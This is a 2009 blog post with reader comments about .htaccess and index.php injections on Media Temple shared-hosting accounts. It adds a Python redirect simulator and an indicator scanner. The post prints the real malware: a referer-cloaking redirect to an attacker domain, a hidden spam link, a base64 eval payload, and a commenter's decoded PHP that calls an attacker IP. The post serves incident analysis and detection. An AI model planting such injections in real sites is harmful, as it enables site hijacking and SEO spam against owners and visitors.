Media Temple/WordPress hacked
15 November 2009 | Posted by Jeffrey Barke | 34 comments
Update (2009-11-16): Given the large number of Grid-Service accounts hacked in a similar fashion, but not running WordPress, I've updated the title to reflect that this appears to be a MediaTemple problem and not due to WordPress. I still don't have any definitive answers, though, and haven't seen any direct statements from either company.
While moving a WordPress site from Media Temple's Grid-Service (gs) to one of their dedicated virtual (dv) servers today, I noticed some "odd" lines in the root .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
The rules redirect any request whose Referer header looks like it came from a search engine to the attacker's site, and the patterns are loose (.*live.*$ or .*msn.*$ fires on any referer containing that substring), while anyone who types the address in, the site owner included, gets the normal page and sees nothing wrong. I immediately knew that this install of WordPress had been compromised, but, prior to deleting the lines, I decided to Google them to find out more about the problem. I found a good post by Adrian Hanft, which recommended another post by Kyle Brady.
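To make the cloaking concrete, here is a small simulation of the rules above. It is an added example, not code from the original post; it reimplements only the slice of mod_rewrite behaviour the injected block relies on (RewriteCond against %{HTTP_REFERER} with the [NC] and [OR] flags, chained in front of one RewriteRule), and the list of visitors at the bottom is constructed for the demo. The function names (parse_rules, conditions_match, redirect_target) are mine.

```python
"""Simulate the injected mod_rewrite block to see which visitors get bounced.

Added example, not from the original post. Covers only what the injected
rules use: RewriteCond on %{HTTP_REFERER} with [NC]/[OR], then one RewriteRule.
"""
import re

# The injected block, as found in the root .htaccess (attacker's redirect target).
INJECTED_HTACCESS = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
"""

COND_RE = re.compile(r"^RewriteCond\s+%\{(\w+)\}\s+(\S+)(?:\s+\[([^\]]*)\])?$")
RULE_RE = re.compile(r"^RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?$")


def _flags(raw):
    """'NC,OR' -> {'NC', 'OR'}; 'R=301,L' -> {'R', 'L'}; None -> set()."""
    return {f.strip().split("=")[0].upper() for f in (raw or "").split(",") if f.strip()}


def parse_rules(text):
    """Return ([(variable, pattern, flags), ...], (pattern, target, flags) or None)."""
    conds, rule = [], None
    for line in text.splitlines():
        line = line.strip()
        m = COND_RE.match(line)
        if m:
            var, pattern, raw = m.groups()
            conds.append((var, pattern, _flags(raw)))
            continue
        m = RULE_RE.match(line)
        if m:
            pattern, target, raw = m.groups()
            rule = (pattern, target, _flags(raw))
    return conds, rule


def conditions_match(conds, env):
    """mod_rewrite chaining: a condition carrying [OR] is ORed with the one
    that follows it; the groups formed that way are ANDed together."""
    groups, current = [], []
    for var, pattern, flags in conds:
        value = env.get(var, "")
        current.append(re.search(pattern, value, re.IGNORECASE if "NC" in flags else 0) is not None)
        if "OR" not in flags:
            groups.append(any(current))
            current = []
    if current:  # a trailing [OR] just closes the last group
        groups.append(any(current))
    return all(groups)


def redirect_target(htaccess_text, request_path, referer):
    """URL the visitor is redirected to, or None when the page is served normally."""
    conds, rule = parse_rules(htaccess_text)
    if rule is None:
        return None
    pattern, target, flags = rule
    if re.search(pattern, request_path) is None:
        return None
    if not conditions_match(conds, {"HTTP_REFERER": referer}):
        return None
    return target if "R" in flags else None


# Constructed visitors: who gets bounced and who sees the normal site.
SAMPLE_VISITORS = [
    ("came from a Google image search", "http://images.google.com/imgres?imgurl=x"),
    ("came from Yahoo web search (not images)", "http://search.yahoo.com/search?p=x"),
    ("site owner, typed the address in", ""),
    ("linked from LiveJournal ('live' substring)", "http://www.livejournal.com/"),
]

if __name__ == "__main__":
    for who, referer in SAMPLE_VISITORS:
        target = redirect_target(INJECTED_HTACCESS, "/index.php", referer)
        print(f"{who:45s} -> {target or 'served normally'}")
```

Run it and the owner's own visit comes back "served normally", which is exactly why this sat unnoticed until the files were inspected; note too that the sloppy substring patterns catch referers that have nothing to do with search engines.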
It appears that this exploit is targeted at Media Temple's (gs) accounts and can also affect Drupal sites. None of the WordPress installs on my (dv) server were affected; every affected site was on my (gs) account, including a domain that had Flyspray installed but not WordPress.
All of the infected domains had the above code in the root .htaccess as well as the following code in the root index.php:
<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
The first line is a zero-height, zero-width block wrapped around a spam link: human visitors never see it, but crawlers index it, which is the point. The base64 string decodes to a few lines of PHP that set $l to http://tourreviews.asia/links2/link.php, fetch that URL with curl (falling back to file() when the curl extension isn't loaded) and print whatever comes back straight into the page, so the attacker can change what your site serves at any time without touching the server again.
Some people reported that blog posts were affected and that the posts had to be manually recreated. So far, I have not detected any compromised posts or any other affected files other than .htaccess and index.php.
This exploit has affected people running up to at least version 2.8.5 of WordPress. Supposedly Media Temple is blaming WordPress and WordPress is blaming Media Temple. Regardless of whose fault it is, if you're running WordPress on Media Temple's Grid-Service, you should check your site out: look at the root .htaccess and index.php of every domain on the account, not just the WordPress ones, and bear in mind that the redirect only fires for visitors arriving from a search engine, so loading the site yourself proves nothing.
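If you have a lot of domains on one account, checking them by hand is tedious, so here is a scanner for the indicators this post describes. It is an added example, not code from the original post, from Media Temple or from WordPress. It walks a web root and flags an .htaccess whose RewriteRule sends search-engine referers off-site, and an index.php/index.html carrying the <!--yje35zfv8SU--> marker, an eval(base64_decode(...)) block or a zero-size hidden link; any base64 payload it finds is decoded so the host it calls home to is visible. The site-a/site-b layout, the clean WordPress files and the stand-in payload (pointing at a reserved .invalid hostname) are constructed for the demo, and the function names are mine.

```python
"""Scan a web root for the .htaccess/index.php indicators described in the post.

Added example, not from the original post, Media Temple or WordPress.
"""
import base64
import os
import re
import tempfile

# Indicators from the post: the HTML-comment marker, a Referer-conditioned
# off-site RewriteRule, an eval(base64_decode()) block and a 0x0 hidden link.
MARKER = "<!--yje35zfv8SU-->"
REFERER_COND = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}", re.I)
OFFSITE_RULE = re.compile(r"RewriteRule\s+\S+\s+(https?://\S+)", re.I)
EVAL_B64 = re.compile(
    r'''eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)''', re.I)
HIDDEN_LINK = re.compile(
    r'<(?:font|div|span)[^>]*style="[^"]*(?:height\s*:\s*0|width\s*:\s*0)[^"]*"[^>]*>'
    r'.*?<a\s+href="([^"]+)"', re.I | re.S)
PAYLOAD_HOST = re.compile(r'''https?://[^\s"']+|\b\d{1,3}(?:\.\d{1,3}){3}\b''')

def decode_payload(b64):
    """Decode an eval(base64_decode()) argument, or None if it is not base64."""
    try:
        return base64.b64decode(b64).decode("utf-8", errors="replace")
    except ValueError:
        return None

def check_htaccess(text):
    """Off-site target of a Referer-conditioned redirect, or None."""
    if not REFERER_COND.search(text):
        return None
    m = OFFSITE_RULE.search(text)
    return m.group(1) if m else None

def check_index(text):
    """List of (indicator, details) tuples found in an index.php/index.html."""
    findings = []
    if MARKER in text:
        findings.append(("marker", [MARKER]))
    for m in EVAL_B64.finditer(text):  # decode so the callback host is visible
        findings.append(("eval_base64", PAYLOAD_HOST.findall(decode_payload(m.group(1)) or "")))
    for m in HIDDEN_LINK.finditer(text):
        findings.append(("hidden_link", [m.group(1)]))
    return findings

def scan(root):
    """Map relative path -> findings for every suspicious .htaccess/index file under root."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name not in (".htaccess", "index.php", "index.html", "index.htm"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                target = check_htaccess(text)
                findings = [("referer_redirect", [target])] if target else []
            else:
                findings = check_index(text)
            if findings:
                hits[os.path.relpath(path, root)] = findings
    return hits

# Constructed sample data: the .htaccess excerpt mirrors the injected rules in the
# post; the payload is a stand-in of the same shape (fetch a URL, print it) aimed
# at a reserved .invalid host so it can never resolve.
INFECTED_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC]
RewriteRule .* http://allvideo.org.uk/in.cgi?4&parameter=sf [R,L]
"""
STANDIN_PAYLOAD = '$l="http://example.invalid/links2/link.php"; print @implode("", file($l));'
INFECTED_INDEX = (
    MARKER + '<font style="position: absolute;overflow: hidden;height: 0;width: 0">'
    '<a href="http://spam.example/t1/page.html">spam</a></font>\n'
    '<?php eval(base64_decode("' + base64.b64encode(STANDIN_PAYLOAD.encode()).decode()
    + '")); ?>\n<?php require("./wp-blog-header.php"); ?>\n'
)
CLEAN_WP_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
"""
CLEAN_WP_INDEX = '<?php define("WP_USE_THEMES", true); require("./wp-blog-header.php"); ?>\n'

def build_sample_site():
    """Write two domains under a temp root: site-a infected, site-b clean."""
    root = tempfile.mkdtemp(prefix="gs-scan-")
    layout = {"site-a/.htaccess": INFECTED_HTACCESS, "site-a/index.php": INFECTED_INDEX,
              "site-b/.htaccess": CLEAN_WP_HTACCESS, "site-b/index.php": CLEAN_WP_INDEX}
    for rel, content in layout.items():
        os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for rel, findings in sorted(scan(build_sample_site()).items()):
        for indicator, details in findings:
            print(f"{rel}: {indicator} {details}")
```

Point scan() at the directory that holds your domains (on a (gs) account, the directory above the per-domain html folders) instead of build_sample_site(). Treat hits as leads rather than verdicts: hotlink protection is also written as a Referer-conditioned RewriteRule, and height: 0 turns up in legitimate CSS. And since the files were changed over FTP, cleaning them is only half the job; the credentials that did it have to be changed as well.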


November 16th, 2009 at 3:07 am
My MT Grid Server account was hacked last week. My .htaccess and index.php files had the exact same changes as what you are showing here. When you decode, it points to some site in Asia.
However, my sites are all Joomla. So, I don’t think it is a vulnerability of Joomla, Drupal or WordPress. Just a few days ago, my Media Temple FTP password was encrypted without asking them to do so. I’m beginning to suspect that they had some type of intrusion.
Thanks for posting this. You should change the title to just Media Temple Hacked.
I have 20 websites and each was changed. This means that they most likely had full access to the root of my account.
If it’s happening to Joomla, Drupal and Wordpress sites, then my guess is Media Temple is to blame.
November 16th, 2009 at 4:10 pm
I hate to say “me too,” but me too. Yours was one of two sites that came up when I searched for “yje35zfv8SU” so thank you for your sleuthing and your post. MT did indeed send out a notice that it was changing my passwords so the problem may lie on their end, but wordpress has had its share of troubles lately. Whatever. I’ll fix and upgrade and secure. Thanks for your post.
November 16th, 2009 at 6:41 pm
Same happened to me. I installed WP but never used it. No Joomla or Drupal.
November 16th, 2009 at 6:51 pm
correction… i also had Drupal installed. never used it either.
November 17th, 2009 at 7:41 am
[...] This post was mentioned on Twitter by Alex Stenshin and Alex Stenshin, Alex Stenshin. Alex Stenshin said: Be careful updating WordPress on @mediatemple, your site can be hacked! http://bit.ly/1leoJN, http://bit.ly/4vGpMb [...]
November 17th, 2009 at 4:22 pm
Exact thing happened to a MT site running Wordpress for me too.
November 18th, 2009 at 5:42 am
Me too. A client e-mailed me this morning and told me that he had seen strange porn site links in the source code of my site. I have some sites running on mediatemple’s grid service, and most of them use WordPress. Updating WP to 2.8.6 alleviated the problem and removed the links, but then I saw that all hand-coded sites had the issue as well. O_O I will look into the issue further now. Jeffrey, if there’s any updates on this, please post on your blog! I for sure will call mediatemple today and see if they have any idea about this thing.
argh.
November 18th, 2009 at 5:58 am
I can now confirm that about 80% of my sites at (mt) have been hacked. Info has been added to .htaccess AND index.html/index.php files.
November 18th, 2009 at 6:08 am
… and I can confirm that WP cannot be blamed, because also hand coded web sites (on domains that have no access to any WP code) have been altered.
Enough for now. Sites clean again, gotta get some coffee. Good luck, folks!
November 18th, 2009 at 5:06 pm
Thanks for the comments, everyone. I agree with you, Tim; it seems the incident was an FTP hack on Media Temple's end and had nothing to do with WordPress.
I noticed the same thing, Matt. 90% of the domains/subdomains on my (gs) account were affected. Only my .htaccess and index.html/index.php files were modified, but they were hacked on both hand-coded and WordPress sites. From what I've read, hand-coded, WordPress, Joomla and ExpressionEngine sites were affected. The latter were broken outright and so easy to spot.
Some people reported that Media Temple notified them of the intrusion via email, but I haven't received anything yet.
November 18th, 2009 at 5:08 pm
This post contains a 17 Nov 2009 update.
November 19th, 2009 at 8:25 am
Update: Media Temple e-mailed me with these words:
> Unfortunately, as we are still in the process of due diligence in this security matter so we cannot share more information at this time. We need to follow security protocol to allow any vendors to publish patches and updates before we can publicly announce anything definitive. And, while I agree wholeheartedly with [name deleted --m] that one should use strong passwords at all times, I can assure you that we have not seen any evidence that the malicious content on your server was a result of a brute force attack.
Hm hm. Time will tell, I guess.
November 22nd, 2009 at 10:35 pm
I stumbled across this on my (gs) sites as well when updating some WP-Super-Cache rules. MT should have emailed its grid customers about this.
November 23rd, 2009 at 1:49 pm
I got hacked too. MULTIPLE web sites on MULTIPLE MT accounts, but none of them had wordpress installed.
The encoded PHP evaluates to this:
// cloaks on the User-Agent: only crawlers get the injected content
if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
{
    $r = '';
    // fetch the spam block from the attacker's host, reporting the victim domain and the crawler's UA
    if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) . " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n"))
        while( $l = fread($f, 1024)) $r .= $l;
    @fclose($f);
    // drop the HTTP headers and print the body straight into the page
    $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}
November 23rd, 2009 at 2:19 pm
Thanks for the info, Fwitz.
I still haven't heard anything from Media Temple and people are still discovering hacked web sites: http://search.twitter.com/search?q=mediatemple+hacked
November 23rd, 2009 at 2:29 pm
Actually, it seems Kyle Brady "got a lengthy, personal email from MediaTemple yesterday, and a long phone call today about this issue—I can't say a lot right now, but Media Temple is taking ownership of this problem, and is working on it. Details to come soon." 16 November 2009
http://www.kyle-brady.com/2009/11/07/wordpress-mediatemple-and-an-injection-attack/#updates
November 24th, 2009 at 1:07 pm
Social comments and analytics for this post…
This post was mentioned on Twitter by stenshin: Be careful updating WordPress on @mediatemple, your sites can be hacked! http://bit.ly/1leoJN, http://bit.ly/4vGpMb...
November 24th, 2009 at 2:04 pm
My friend and I are guessing that it’s trying to steal hotmail/gmail/yahoo mail accounts.
November 24th, 2009 at 7:29 pm
Same thing here… GS customer with an outdated version of Drupal installed, but not in use. I received an email about suspicious FTP use. Sure enough, every one of my domains compromised.
November 26th, 2009 at 1:11 am
Thanks so much for this post.
All my wordpress websites were hacked, even though I have so much “security” it’s ridiculous. Stealth Login, Login Lockout, Antivirus and Firewall plugins installed and running on all wordpress sites, plus stupid long passwords that are randomly generated with special characters, numbers and letters.
Now today I receive an email from MT telling me of suspicious FTP activity on my account overnight, and they’ve disabled my FTP access.
Except, they haven't disabled it for ALL accounts, just one – which is USELESS.
So I've removed all FTP from all accounts other than my own, reset the passwords, cleaned all the wordpress installs and .htaccess files.
I can only hope MT and WP are speaking to each other to find a solution.
November 26th, 2009 at 2:11 am
Me too. I actually got a response from a media temple tech that intimated that all the hacks were done through my server admin account. Either I’m misunderstanding and he simply means all the hacks on my (gs) were done via my server admin, or I have to really reassess their security procedures and protocols if my serveradmin account was able to hack other people’s (gs) accounts.
November 26th, 2009 at 3:22 am
Apparently MediaTemple were storing passwords in plain text!
That’s the twitter goss.
November 26th, 2009 at 9:47 am
[...] number of people (Michael Torbert, Kyle Brady, Jeffrey Barke, Adrian Hanft) are reporting that their Media Temple sites have been hacked. Digging Into WordPress [...]
November 26th, 2009 at 5:21 pm
Hey folks,
If you haven’t read this already:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
It will answer lots of your questions.
If you find ftp access isn’t working, please submit a support request. Passwords were changed (as you know) but ftp access wasn’t disabled.
Matt from (mt)
November 26th, 2009 at 9:16 pm
Me too. Mediatemple did not fess up to the vulnerability but after they reset my passwords without my permission (then proceeded to have two hours of downtime so I couldn’t reset my password), I figured it had to be their problem.
Also, when I called in, they asked me for my password, and they said OK quickly enough to let me know the support guy was looking at a plain text version of my password (he couldn’t have typed it in to check that quickly). This means they don’t store a one-way hash of the password, but the actual password. This is poor, poor security IMHO.
I’d like a year of paid hosting or an upgrade to DV for the hassle. All my sites were affected and trying to pick through which files were affected and which were not is a royal PITA.
November 27th, 2009 at 2:49 am
[...] the extent of the security breach. My understanding of the incident, (as also blogged here and here), is that someone got ahold of many of the admin passwords for Grid Service (GS) accounts and thus [...]
November 29th, 2009 at 11:37 am
Thanks for the link, Matt. It's definitely worth following and reading.
According to Media Temple, aaron, they're "not certain this exploit is directly related to the way we were storing passwords," which do appear to be stored in plain text. But I agree with you—if the passwords were not stored as one-way hashes, it was poor security.
November 29th, 2009 at 4:30 pm
[...] passwords were stolen. In addition, many codes were added to people’s files. According to Jeffrey Barke, there were codes injected in index.php, and while there were codes injected in other parts of the [...]
November 30th, 2009 at 7:28 pm
(mt) Media Temple just posted a new update on the spam injection issue with some new info and progress updates.
check it out here:
http://weblog.mediatemple.net/weblog/category/system-incidents/1026-gs-security-advisory/
December 2nd, 2009 at 2:06 pm
All my sites hosted with Media Temple were compromised. Both .htaccess and index.php files modified in Joomla or wordpress directories – different accounts. The interesting thing about this is that the perpetrators were able to access the admin control as well and turn on SSH and create a separate admin user. Media Temple surely got caught with their pants down due to lack of security. Who ever crashed this party surely isn’t interested in a reality show – unless their name is Kevin Mitnick.
December 3rd, 2009 at 7:58 am
[...] post: JeffreyBarke.net » Blog Archive » Media Temple/WordPress hacked By admin | category: media temple | tags: account, kyle-the-invincible, media temple, [...]
December 9th, 2009 at 3:02 am
Hi Jeff!
It seems to me that this is very similar to what went on at DH just about a year ago, if I’m not mistaken!
December 19th, 2009 at 4:16 pm
I got a call from a client this morning saying their Drupal site was down. After finding the problem and this post the issue is exactly the same as what’s posted above.
The scary thing is that I am on a DV server. Don’t think that this is just a GS issue.
Just about to contact mediaTemple. I’ll post back if I find out anything extra.
March 11th, 2010 at 3:15 am
By far the most concise and up to date information I found on this topic. Sure glad that I navigated to your page by accident. I’ll be subscribing to your feed so that I can get the latest updates. Appreciate all the information here